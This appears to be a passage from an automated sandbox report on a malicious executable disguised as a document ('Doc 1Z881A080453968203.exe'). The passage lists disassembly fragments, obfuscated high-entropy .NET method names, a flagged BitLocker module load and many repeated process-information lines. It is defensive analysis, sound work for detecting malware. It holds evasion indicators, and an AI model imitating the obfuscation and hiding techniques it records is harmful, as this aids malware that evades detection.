                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00422A53 push esp; ret 7_2_00422A72
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00414341 push ecx; ret 7_2_0041435A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040842C push es; ret 7_2_00408435
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0040852D push es; ret 7_2_0040852F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_004035E0 push eax; ret 7_2_004035E2
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_00417D9F push cs; ret 7_2_00417DA1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_016F225F pushad ; ret 7_2_016F27F9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_016F27FA pushad ; ret 7_2_016F27F9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017209AD push ecx; mov dword ptr [esp], ecx7_2_017209B6
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_016F283D push eax; iretd 7_2_016F2858
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_04F709AD push ecx; mov dword ptr [esp], ecx14_2_04F709B6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F10280 push esp; retf 14_2_02F10289
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F103B6 push ebx; ret 14_2_02F103C1
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F147BC push cs; ret 14_2_02F147BE
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F1F470 push esp; ret 14_2_02F1F48F
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F16BE0 push esi; iretd 14_2_02F16BF9
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F04E49 push es; ret 14_2_02F04E52
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F04F4A push es; ret 14_2_02F04F4C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F16C63 push 54822BC7h; retf 14_2_02F16C6D
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F10D5E push ecx; ret 14_2_02F10D77
                Source: Doc 1Z881A080453968203.exeStatic PE information: section name: .text entropy: 7.976391309328641
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, q5jGnyqaB7IbpaHE4J.csHigh entropy of concatenated method names: 'X0AmvguyaN', 'RFtmPXVIFF', 'MUkmIG6bHo', 'BAKm7TUfYl', 'hETmxPJUpZ', 'rmgmiDUj8v', 'g7QmGGdIk3', 'P4ImJD8KaQ', 'QJvmtpPG1m', 'q8EmhXLthM'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, zBCVMZUByrs5YB2Jk5.csHigh entropy of concatenated method names: 'sRMeK8dmO2', 'beIeDNX1ly', 't2PeU7ZXl7', 'mRyeoHZhxG', 'qqQeT7Rin8', 'us8eEdprK8', 'sVHeMfuudE', 'jPpegdbZ3E', 'gGVeaPgWFO', 'enQeBEW3Ut'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, SQHUDkV9u6Tc5vi4PD.csHigh entropy of concatenated method names: 'xTbcq9byDQ', 'X2yc4hUw6m', 'gm3mQOkAja', 'N5bmWK45jT', 'EqGcFxdtv9', 'cLbcD2Pmly', 'GyDcfHyI69', 'p9BcU1ajRa', 'rd1coAWqmA', 'RxGcyPAfbb'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, VNyw9Sz5H5ax9LDTww.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i8au84BlcW', 'tSjueT1Q7P', 'WleuATkmFt', 'yInucjhUP1', 'Wm5umZc2FG', 'r7auu4TFAP', 'qoOunWcFgy'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, mXVh055C31sAylO3R5.csHigh entropy of concatenated method names: 'QSC7pt4XeV', 'eDT79MhjNw', 'F1jIEsfVsw', 'vvHIMIl8UR', 'u2eIgbNash', 'Fd2IaBWTNI', 'z0gIBKdM5t', 'VkcId5xgir', 'NP1I1rubRj', 'GeDIK1ovcw'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, MGC2kE1GeTrZuhdARo.csHigh entropy of concatenated method names: 'b2yirkIXOF', 'IPniNT5kA7', 'KDjiHGQoKJ', 'qUsikBSDK4', 'dN1iploqSr', 'GwZiLiu9gk', 'hXNi9ZPsHZ', 'GugiwJVIrG', 'SVxiX3mYHQ', 'jmDi5h9jxa'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, wle9kb4l95GgLsLqLM.csHigh entropy of concatenated method names: 'FYTuWMKjSS', 'RqZu6jaHyy', 'JvLuYU3EBc', 'syCuvchT9a', 'mrJuPRxIfS', 'XA8u7gZlOO', 't2nuxnJX9X', 'RKYmSVVwmq', 'xZdmqvfMWu', 'rlEmRgpyKt'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, w662Q0C3PDPuKY1SwB.csHigh entropy of concatenated method names: 'mgHHXhBi4', 'JOOkkhXeB', 'ND4LyUpls', 'hSv9lIe16', 'JRIX3wfth', 'bgT5rtwrx', 'Y9YlhglBb0qjxwBN9g', 'ybOER36LwDLkqJpukL', 'RRBmxgqZ9', 'niOnP35aX'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, CKuiFuwbUv7jQAoi78.csHigh entropy of concatenated method names: 'jeSPUED4V7', 'vfjPo0utIB', 'df6PyW1cRP', 'TPOPlOiUyQ', 'wCVPjMpfhk', 'PTTPVgNf5O', 'HmLPSvLvaF', 'TKhPqKD4yT', 'h7uPR7JAP4', 'CFMP4YnoiR'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, GufG7tGXRf6WvLPGu5.csHigh entropy of concatenated method names: 'Qas6s9roxw', 'zou6vyh8ri', 'KaR6PTq3Fr', 'B8k6ItQxrZ', 'B3T67InfIR', 's1D6x0kZRg', 'tGK6i9MlkR', 'JEw6GWPxPm', 'TkG6Jf4Rmc', 'nO26tjNadt'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, DeE2FFPwwTUaTkx65n.csHigh entropy of concatenated method names: 'Dispose', 'hMdWRIND7V', 'XSlCTbufZ6', 'JwkGGBtHAV', 'Ec5W4jGnya', 'L7IWzbpaHE', 'ProcessDialogKey', 'YJCCQBmpAL', 'zqqCWhIRM9', 'UZsCCZle9k'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, PP565wX3u45xhWFeM0.csHigh entropy of concatenated method names: 'sh5Ik4GZQe', 'vPlILw5msT', 'YmwIwVcBed', 'hBSIXCD3pK', 'lMLIeObu3v', 'ectIAo7aXu', 'K5OIcRosxE', 'IVmImaSJT6', 'NP8IuoN9kB', 'rxZInqmHtu'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, J20CiFlNbjYrDNXUbv.csHigh entropy of concatenated method names: 'D0wctrT9cF', 'qgBch7s518', 'ToString', 'IrvcvJdHIR', 'kt6cPHBvjG', 'bvWcIfqM8c', 'o9wc7sQHBh', 'yBccxd0Tjs', 'OLYciar4vY', 'BhocGklYlW'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, bNmdJFYRSrLObHd2ot.csHigh entropy of concatenated method names: 'Su9WiKuiFu', 'uUvWG7jQAo', 'D3uWt45xhW', 'OeMWh0tXVh', 'TO3WeR5WyM', 'o2fWAXcQms', 'MXv0hCIwCrPPTnI0vP', 'nnsRN6jRUgZyhepjvY', 'ImsWWhF3cB', 'G0hW6EsJ8n'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, cBmpALRHqqhIRM9jZs.csHigh entropy of concatenated method names: 'RI2mO6kBk2', 'vdemT8lwB4', 'XhnmEJiKe5', 'on1mMjsgkZ', 'pklmULxb4X', 'r5ymgLS5pa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, byMe2fOXcQms1qZVGS.csHigh entropy of concatenated method names: 'bMpxsDeavl', 'k47xPOIt3g', 'cUfx728G4K', 'qf9xi5ow9o', 'nnJxGQCxEJ', 'ggv7jsroDX', 'fE37V2RhgN', 'cyj7SMsc9t', 'xRb7qbRxev', 'IHP7R2pnvm'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, Yo4fi1WQ7iv9EiIkb6f.csHigh entropy of concatenated method names: 'B9OurxEmF2', 'u7puNF92bI', 'pO5uHnvIHE', 'WOKukg1Cd9', 'vrvupAZ5Wv', 'nwouLbVER0', 'Nrgu9TKG1x', 'XSAuwtDd4d', 'vkOuXd8sEP', 'OPJu5GNtqX'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, JqReToW6A5roPTmnRbx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kWOnUTuXYG', 'jfJnodXwkR', 'ue8nyGDS9w', 'vR3nlwSNfJ', 'htbnj64VrR', 'qIunVwIy9w', 'LnrnS5C0Bu'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, T9jWBWfb6RtM9K5gaC.csHigh entropy of concatenated method names: 'drP8wAZGJ6', 'xmL8XkimWN', 'yo48OG6lvD', 'b3E8TWeJRX', 'Bwb8MueArf', 'cfn8gF1kqm', 'MBj8BJJ9B3', 'gLo8d0db6d', 'V9q8KFalkE', 'djf8Fkih6m'
                Source: 0.2.Doc 1Z881A080453968203.exe.6310000.9.raw.unpack, OB2YfUybyNFhG01KSE.csHigh entropy of concatenated method names: 'ToString', 'ssHAFdathe', 'KV2ATFqtIe', 'f5ZAEqhgSS', 'd9uAMIndlF', 'B8sAgbm89y', 'FiHAa12HGg', 'SLhABInbeL', 'o7tAdxkQ57', 'B2xA1DMMCq'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, q5jGnyqaB7IbpaHE4J.csHigh entropy of concatenated method names: 'X0AmvguyaN', 'RFtmPXVIFF', 'MUkmIG6bHo', 'BAKm7TUfYl', 'hETmxPJUpZ', 'rmgmiDUj8v', 'g7QmGGdIk3', 'P4ImJD8KaQ', 'QJvmtpPG1m', 'q8EmhXLthM'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, zBCVMZUByrs5YB2Jk5.csHigh entropy of concatenated method names: 'sRMeK8dmO2', 'beIeDNX1ly', 't2PeU7ZXl7', 'mRyeoHZhxG', 'qqQeT7Rin8', 'us8eEdprK8', 'sVHeMfuudE', 'jPpegdbZ3E', 'gGVeaPgWFO', 'enQeBEW3Ut'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, SQHUDkV9u6Tc5vi4PD.csHigh entropy of concatenated method names: 'xTbcq9byDQ', 'X2yc4hUw6m', 'gm3mQOkAja', 'N5bmWK45jT', 'EqGcFxdtv9', 'cLbcD2Pmly', 'GyDcfHyI69', 'p9BcU1ajRa', 'rd1coAWqmA', 'RxGcyPAfbb'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, VNyw9Sz5H5ax9LDTww.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i8au84BlcW', 'tSjueT1Q7P', 'WleuATkmFt', 'yInucjhUP1', 'Wm5umZc2FG', 'r7auu4TFAP', 'qoOunWcFgy'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, mXVh055C31sAylO3R5.csHigh entropy of concatenated method names: 'QSC7pt4XeV', 'eDT79MhjNw', 'F1jIEsfVsw', 'vvHIMIl8UR', 'u2eIgbNash', 'Fd2IaBWTNI', 'z0gIBKdM5t', 'VkcId5xgir', 'NP1I1rubRj', 'GeDIK1ovcw'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, MGC2kE1GeTrZuhdARo.csHigh entropy of concatenated method names: 'b2yirkIXOF', 'IPniNT5kA7', 'KDjiHGQoKJ', 'qUsikBSDK4', 'dN1iploqSr', 'GwZiLiu9gk', 'hXNi9ZPsHZ', 'GugiwJVIrG', 'SVxiX3mYHQ', 'jmDi5h9jxa'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, wle9kb4l95GgLsLqLM.csHigh entropy of concatenated method names: 'FYTuWMKjSS', 'RqZu6jaHyy', 'JvLuYU3EBc', 'syCuvchT9a', 'mrJuPRxIfS', 'XA8u7gZlOO', 't2nuxnJX9X', 'RKYmSVVwmq', 'xZdmqvfMWu', 'rlEmRgpyKt'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, w662Q0C3PDPuKY1SwB.csHigh entropy of concatenated method names: 'mgHHXhBi4', 'JOOkkhXeB', 'ND4LyUpls', 'hSv9lIe16', 'JRIX3wfth', 'bgT5rtwrx', 'Y9YlhglBb0qjxwBN9g', 'ybOER36LwDLkqJpukL', 'RRBmxgqZ9', 'niOnP35aX'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, CKuiFuwbUv7jQAoi78.csHigh entropy of concatenated method names: 'jeSPUED4V7', 'vfjPo0utIB', 'df6PyW1cRP', 'TPOPlOiUyQ', 'wCVPjMpfhk', 'PTTPVgNf5O', 'HmLPSvLvaF', 'TKhPqKD4yT', 'h7uPR7JAP4', 'CFMP4YnoiR'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, GufG7tGXRf6WvLPGu5.csHigh entropy of concatenated method names: 'Qas6s9roxw', 'zou6vyh8ri', 'KaR6PTq3Fr', 'B8k6ItQxrZ', 'B3T67InfIR', 's1D6x0kZRg', 'tGK6i9MlkR', 'JEw6GWPxPm', 'TkG6Jf4Rmc', 'nO26tjNadt'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, DeE2FFPwwTUaTkx65n.csHigh entropy of concatenated method names: 'Dispose', 'hMdWRIND7V', 'XSlCTbufZ6', 'JwkGGBtHAV', 'Ec5W4jGnya', 'L7IWzbpaHE', 'ProcessDialogKey', 'YJCCQBmpAL', 'zqqCWhIRM9', 'UZsCCZle9k'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, PP565wX3u45xhWFeM0.csHigh entropy of concatenated method names: 'sh5Ik4GZQe', 'vPlILw5msT', 'YmwIwVcBed', 'hBSIXCD3pK', 'lMLIeObu3v', 'ectIAo7aXu', 'K5OIcRosxE', 'IVmImaSJT6', 'NP8IuoN9kB', 'rxZInqmHtu'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, J20CiFlNbjYrDNXUbv.csHigh entropy of concatenated method names: 'D0wctrT9cF', 'qgBch7s518', 'ToString', 'IrvcvJdHIR', 'kt6cPHBvjG', 'bvWcIfqM8c', 'o9wc7sQHBh', 'yBccxd0Tjs', 'OLYciar4vY', 'BhocGklYlW'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, bNmdJFYRSrLObHd2ot.csHigh entropy of concatenated method names: 'Su9WiKuiFu', 'uUvWG7jQAo', 'D3uWt45xhW', 'OeMWh0tXVh', 'TO3WeR5WyM', 'o2fWAXcQms', 'MXv0hCIwCrPPTnI0vP', 'nnsRN6jRUgZyhepjvY', 'ImsWWhF3cB', 'G0hW6EsJ8n'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, cBmpALRHqqhIRM9jZs.csHigh entropy of concatenated method names: 'RI2mO6kBk2', 'vdemT8lwB4', 'XhnmEJiKe5', 'on1mMjsgkZ', 'pklmULxb4X', 'r5ymgLS5pa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, byMe2fOXcQms1qZVGS.csHigh entropy of concatenated method names: 'bMpxsDeavl', 'k47xPOIt3g', 'cUfx728G4K', 'qf9xi5ow9o', 'nnJxGQCxEJ', 'ggv7jsroDX', 'fE37V2RhgN', 'cyj7SMsc9t', 'xRb7qbRxev', 'IHP7R2pnvm'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, Yo4fi1WQ7iv9EiIkb6f.csHigh entropy of concatenated method names: 'B9OurxEmF2', 'u7puNF92bI', 'pO5uHnvIHE', 'WOKukg1Cd9', 'vrvupAZ5Wv', 'nwouLbVER0', 'Nrgu9TKG1x', 'XSAuwtDd4d', 'vkOuXd8sEP', 'OPJu5GNtqX'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, JqReToW6A5roPTmnRbx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kWOnUTuXYG', 'jfJnodXwkR', 'ue8nyGDS9w', 'vR3nlwSNfJ', 'htbnj64VrR', 'qIunVwIy9w', 'LnrnS5C0Bu'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, T9jWBWfb6RtM9K5gaC.csHigh entropy of concatenated method names: 'drP8wAZGJ6', 'xmL8XkimWN', 'yo48OG6lvD', 'b3E8TWeJRX', 'Bwb8MueArf', 'cfn8gF1kqm', 'MBj8BJJ9B3', 'gLo8d0db6d', 'V9q8KFalkE', 'djf8Fkih6m'
                Source: 0.2.Doc 1Z881A080453968203.exe.4272c00.6.raw.unpack, OB2YfUybyNFhG01KSE.csHigh entropy of concatenated method names: 'ToString', 'ssHAFdathe', 'KV2ATFqtIe', 'f5ZAEqhgSS', 'd9uAMIndlF', 'B8sAgbm89y', 'FiHAa12HGg', 'SLhABInbeL', 'o7tAdxkQ57', 'B2xA1DMMCq'
                Source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
